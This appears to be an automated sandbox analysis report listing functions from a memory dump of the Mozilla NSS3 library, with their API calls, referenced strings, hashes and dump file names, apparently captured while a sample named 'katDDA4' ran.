                                                              • PR_CallOnce.NSS3(6D232AA4,6D1312D0), ref: 6D14AE4D
                                                                • Part of subcall function 6D054C70: TlsGetValue.KERNEL32(?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054C97
                                                                • Part of subcall function 6D054C70: EnterCriticalSection.KERNEL32(?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054CB0
                                                                • Part of subcall function 6D054C70: PR_Unlock.NSS3(?,?,?,?,?,6D053921,6D2314E4,6D19CC70), ref: 6D054CC9
                                                              • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D14AE93
                                                              • PR_CallOnce.NSS3(6D232AA4,6D1312D0), ref: 6D14AECC
                                                              • PL_FreeArenaPool.NSS3 ref: 6D14AEDE
                                                              • PL_FinishArenaPool.NSS3 ref: 6D14AEE6
                                                              • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D14AEF5
                                                              • PL_FinishArenaPool.NSS3 ref: 6D14AF16
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                              • String ID: security
                                                              • API String ID: 3441714441-3315324353
                                                              • Opcode ID: 5fb3c3e5247bfa081fbcc39fbad90bf42b0a9cd65b040717044d9d078e3cbb00
                                                              • Instruction ID: 4091a3f974b3bf5f1896439df964c2316a478127e93806f6c9cd673d2a477d80
                                                              • Opcode Fuzzy Hash: 5fb3c3e5247bfa081fbcc39fbad90bf42b0a9cd65b040717044d9d078e3cbb00
                                                              • Instruction Fuzzy Hash: 1B4138B1C8821567E7218B249C44F7F32A4AF5231CF038135EA24A724EFBF59A54C6E3
                                                              Function 6D0E8DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • TlsGetValue.KERNEL32(?,?), ref: 6D0E8E22
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D0E8E36
                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6D0E8E4F
                                                              • calloc.MOZGLUE(00000001,?,?,?), ref: 6D0E8E78
                                                              • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6D0E8E9B
                                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6D0E8EAC
                                                              • PL_ArenaAllocate.NSS3(?,?), ref: 6D0E8EDE
                                                              • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6D0E8EF0
                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6D0E8F00
                                                              • free.MOZGLUE(?), ref: 6D0E8F0E
                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6D0E8F39
                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6D0E8F4A
                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6D0E8F5B
                                                              • PR_Unlock.NSS3(?), ref: 6D0E8F72
                                                              • PR_Unlock.NSS3(?), ref: 6D0E8F82
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                              • String ID:
                                                              • API String ID: 1569127702-0
                                                              • Opcode ID: e227091818c99c6744ab672f347133b842929d36f69d399c455621a68f944941
                                                              • Instruction ID: 2ddb53438fdb41ec09cd51ad10efd1f41207561f7d1dbe39ef8883b914ff5a3c
                                                              • Opcode Fuzzy Hash: e227091818c99c6744ab672f347133b842929d36f69d399c455621a68f944941
                                                              • Instruction Fuzzy Hash: 5751F4B2D046169FEB118F68CC84A6EB7B9FF85798F158128ED1897300E771EE4087D1
                                                              Function 6D05DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6D05DD56
                                                              • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6D05DD7C
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6D05DE67
                                                              • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6D05DEC4
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D05DECD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: memcpy$_byteswap_ulong
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                              • API String ID: 2339628231-598938438
                                                              • Opcode ID: 8f23446cc00e918dac05f193ef48ded92c8ff680fc125fca8dfcef3bb9712427
                                                              • Instruction ID: aaac4b94930672cbc903a5614289e9b05475e7fbe3cd63cd9aa0b0efd40843ad
                                                              • Opcode Fuzzy Hash: 8f23446cc00e918dac05f193ef48ded92c8ff680fc125fca8dfcef3bb9712427
                                                              • Instruction Fuzzy Hash: 2AA1C675A082019BE711DF19C980B6BB7F5AFC5304F05892EFC898B251E770E965CBB1
                                                              Function 6D11EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PORT_Alloc_Util.NSS3(?), ref: 6D11EE0B
                                                                • Part of subcall function 6D130BE0: malloc.MOZGLUE(6D128D2D,?,00000000,?), ref: 6D130BF8
                                                                • Part of subcall function 6D130BE0: TlsGetValue.KERNEL32(6D128D2D,?,00000000,?), ref: 6D130C15
                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6D11EEE1
                                                                • Part of subcall function 6D111D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6D111D7E
                                                                • Part of subcall function 6D111D50: EnterCriticalSection.KERNEL32(?), ref: 6D111D8E
                                                                • Part of subcall function 6D111D50: PR_Unlock.NSS3(?), ref: 6D111DD3
                                                              • TlsGetValue.KERNEL32 ref: 6D11EE51
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D11EE65
                                                              • PR_Unlock.NSS3(?), ref: 6D11EEA2
                                                              • free.MOZGLUE(?), ref: 6D11EEBB
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D11EED0
                                                              • PR_Unlock.NSS3(?), ref: 6D11EF48
                                                              • free.MOZGLUE(?), ref: 6D11EF68
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D11EF7D
                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6D11EFA4
                                                              • free.MOZGLUE(?), ref: 6D11EFDA
                                                              • PR_SetError.NSS3(FFFFE040,00000000), ref: 6D11F055
                                                              • free.MOZGLUE(?), ref: 6D11F060
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                              • String ID:
                                                              • API String ID: 2524771861-0
                                                              • Opcode ID: f00d11fac6e02ce8dac8b4fe686679528af9f9b6e1700e76dab4b531ed9f02db
                                                              • Instruction ID: 297ca3bf53e93eb86656a78e71019d700f71207d02adf0015df1070f75366872
                                                              • Opcode Fuzzy Hash: f00d11fac6e02ce8dac8b4fe686679528af9f9b6e1700e76dab4b531ed9f02db
                                                              • Instruction Fuzzy Hash: D1818375A0420A9BDF01DFA4DC45BAE7BB5BF18318F054034FE09A3615E7B1EA64CBA1
                                                              Function 6D125C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6D125C9B
                                                              • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6D125CF4
                                                              • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6D125CFD
                                                              • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6D125D42
                                                              • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6D125D4E
                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D125D78
                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6D125E18
                                                              • TlsGetValue.KERNEL32 ref: 6D125E5E
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D125E72
                                                              • PR_Unlock.NSS3(?), ref: 6D125E8B
                                                                • Part of subcall function 6D11F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6D11F854
                                                                • Part of subcall function 6D11F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6D11F868
                                                                • Part of subcall function 6D11F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6D11F882
                                                                • Part of subcall function 6D11F820: free.MOZGLUE(04C483FF,?,?), ref: 6D11F889
                                                                • Part of subcall function 6D11F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6D11F8A4
                                                                • Part of subcall function 6D11F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6D11F8AB
                                                                • Part of subcall function 6D11F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6D11F8C9
                                                                • Part of subcall function 6D11F820: free.MOZGLUE(280F10EC,?,?), ref: 6D11F8D0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                              • String ID: d$tokens=[0x%x=<%s>]
                                                              • API String ID: 2028831712-1373489631
                                                              • Opcode ID: 5a2a76ed8c1f83b4a0c69c6adb176f1b96c1131dacde06e274c459338a711160
                                                              • Instruction ID: 4aa0d110cac4491f75a7f84e8d9141fe4b493c1f06f3d2d2e42576665215e421
                                                              • Opcode Fuzzy Hash: 5a2a76ed8c1f83b4a0c69c6adb176f1b96c1131dacde06e274c459338a711160
                                                              • Instruction Fuzzy Hash: CA71F2B4A441069BFB119F24EC8573B7379BF55328F054034E9099A24EFBB3E9A1C692
                                                              Function 6D116C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6D11781D,00000000,6D10BE2C,?,6D116B1D,?,?,?,?,00000000,00000000,6D11781D), ref: 6D116C40
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6D11781D,?,6D10BE2C,?), ref: 6D116C58
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6D11781D), ref: 6D116C6F
                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6D116C84
                                                              • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6D116C96
                                                                • Part of subcall function 6D0C1240: TlsGetValue.KERNEL32(00000040,?,6D0C116C,NSPR_LOG_MODULES), ref: 6D0C1267
                                                                • Part of subcall function 6D0C1240: EnterCriticalSection.KERNEL32(?,?,?,6D0C116C,NSPR_LOG_MODULES), ref: 6D0C127C
                                                                • Part of subcall function 6D0C1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6D0C116C,NSPR_LOG_MODULES), ref: 6D0C1291
                                                                • Part of subcall function 6D0C1240: PR_Unlock.NSS3(?,?,?,?,6D0C116C,NSPR_LOG_MODULES), ref: 6D0C12A0
                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6D116CAA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                              • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                              • API String ID: 4221828374-3736768024
                                                              • Opcode ID: 0ed9477dc874829d6dc8e47afe863528419753c8dfb4e012cd70bc3c70774e6a
                                                              • Instruction ID: 164919e6ea8eb2d3fbe451ad71ff987ccb9376316c3d0e766f6003666421e442
                                                              • Opcode Fuzzy Hash: 0ed9477dc874829d6dc8e47afe863528419753c8dfb4e012cd70bc3c70774e6a
                                                              • Instruction Fuzzy Hash: 4901A7F2B4931A67F7102B796C49F37259CAF815A8F040131FF14E1146EBD3D515A0E6
                                                              Function 6D0CACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                              • String ID:
                                                              • API String ID: 786543732-0
                                                              • Opcode ID: 74cb4473e108a4dd471186ee99a11b790842c14141a4d3815811f8751fc2d587
                                                              • Instruction ID: f3018baa7f15022edffe89aa7f91031c20f7991231e1769d568fbf11acdfbbe3
                                                              • Opcode Fuzzy Hash: 74cb4473e108a4dd471186ee99a11b790842c14141a4d3815811f8751fc2d587
                                                              • Instruction Fuzzy Hash: 7651C1B4D042168BEF12CFA8DC49B6F77B4BB06349F264125ED05A7210E331A955CBE3
                                                              Function 6D10ADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6D10ADE6
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D10AE17
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D10AE29
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D10AE3F
                                                              • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6D10AE78
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D10AE8A
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D10AEA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: L_strncpyzPrint$L_strcatn
                                                              • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
                                                              • API String ID: 332880674-605059067
                                                              • Opcode ID: 9130fc6329cf8190c55c44138074c191077929ab466e057058129b0e22e76e11
                                                              • Instruction ID: 3dcde0cc7ce328024c7e4afdefe6e7025bda1501327cdbe9f0561dcf8c5cf886
                                                              • Opcode Fuzzy Hash: 9130fc6329cf8190c55c44138074c191077929ab466e057058129b0e22e76e11
                                                              • Instruction Fuzzy Hash: 1C31F275544204ABDB20AF54DD8CF7F37B5AF8631CF064024F609AB216DFB09845CBA2
                                                              Function 6D1A4C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • sqlite3_value_text16.NSS3(?), ref: 6D1A4CAF
                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D1A4CFD
                                                              • sqlite3_value_text16.NSS3(?), ref: 6D1A4D44
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: sqlite3_value_text16$sqlite3_log
                                                              • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                              • API String ID: 2274617401-4033235608
                                                              • Opcode ID: d967b785de1c5f7510b0882a3bf4e7bde2e3c65a9045e627598b7ee6dfa2657f
                                                              • Instruction ID: 41ba30fc8ff673238ab48d717dd04b28f77336511b30bc5ef979d6086a771ba2
                                                              • Opcode Fuzzy Hash: d967b785de1c5f7510b0882a3bf4e7bde2e3c65a9045e627598b7ee6dfa2657f
                                                              • Instruction Fuzzy Hash: FF3146BDA48916A7E7194624B8047B5B36277AE324F0F4135E82D5B25DCFE1BC1283E3
                                                              Function 6D102DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_InitPIN), ref: 6D102DF6
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D102E24
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D102E33
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D102E49
                                                              • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6D102E68
                                                              • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6D102E81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                              • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
                                                              • API String ID: 1003633598-1777813432
                                                              • Opcode ID: fde9a90ec05099ed66b49afa5cd03f4424ec8d45bd76d9eb510868fd10b6f6a5
                                                              • Instruction ID: ef761f71bdf9daa9449eb80b6ed78820e0199c684caa93ac4d7138b02268c06b
                                                              • Opcode Fuzzy Hash: fde9a90ec05099ed66b49afa5cd03f4424ec8d45bd76d9eb510868fd10b6f6a5
                                                              • Instruction Fuzzy Hash: B43104B9544114ABDB30AF55DE8CB2B37B5EF8631CF064024FA08A7216DFB09945CBE2
                                                              Function 6D1A2D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • sqlite3_initialize.NSS3 ref: 6D1A2D9F
                                                                • Part of subcall function 6D05CA30: EnterCriticalSection.KERNEL32(?,?,?,6D0BF9C9,?,6D0BF4DA,6D0BF9C9,?,?,6D08369A), ref: 6D05CA7A
                                                                • Part of subcall function 6D05CA30: LeaveCriticalSection.KERNEL32(?), ref: 6D05CB26
                                                              • sqlite3_exec.NSS3(?,?,6D1A2F70,?,?), ref: 6D1A2DF9
                                                              • sqlite3_free.NSS3(00000000), ref: 6D1A2E2C
                                                              • sqlite3_free.NSS3(?), ref: 6D1A2E3A
                                                              • sqlite3_free.NSS3(?), ref: 6D1A2E52
                                                              • sqlite3_mprintf.NSS3(6D20AAF9,?), ref: 6D1A2E62
                                                              • sqlite3_free.NSS3(?), ref: 6D1A2E70
                                                              • sqlite3_free.NSS3(?), ref: 6D1A2E89
                                                              • sqlite3_free.NSS3(?), ref: 6D1A2EBB
                                                              • sqlite3_free.NSS3(?), ref: 6D1A2ECB
                                                              • sqlite3_free.NSS3(00000000), ref: 6D1A2F3E
                                                              • sqlite3_free.NSS3(?), ref: 6D1A2F4C
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                              • String ID:
                                                              • API String ID: 1957633107-0
                                                              • Opcode ID: b8be694c5bd890260d8bec08cce80c38f7da46708ea8c0d56d6671746d7e987b
                                                              • Instruction ID: 4adf8e1f8f3db5b2905a9adce5fb7ba63eb8ab8995c8820bcc69be4e110b331d
                                                              • Opcode Fuzzy Hash: b8be694c5bd890260d8bec08cce80c38f7da46708ea8c0d56d6671746d7e987b
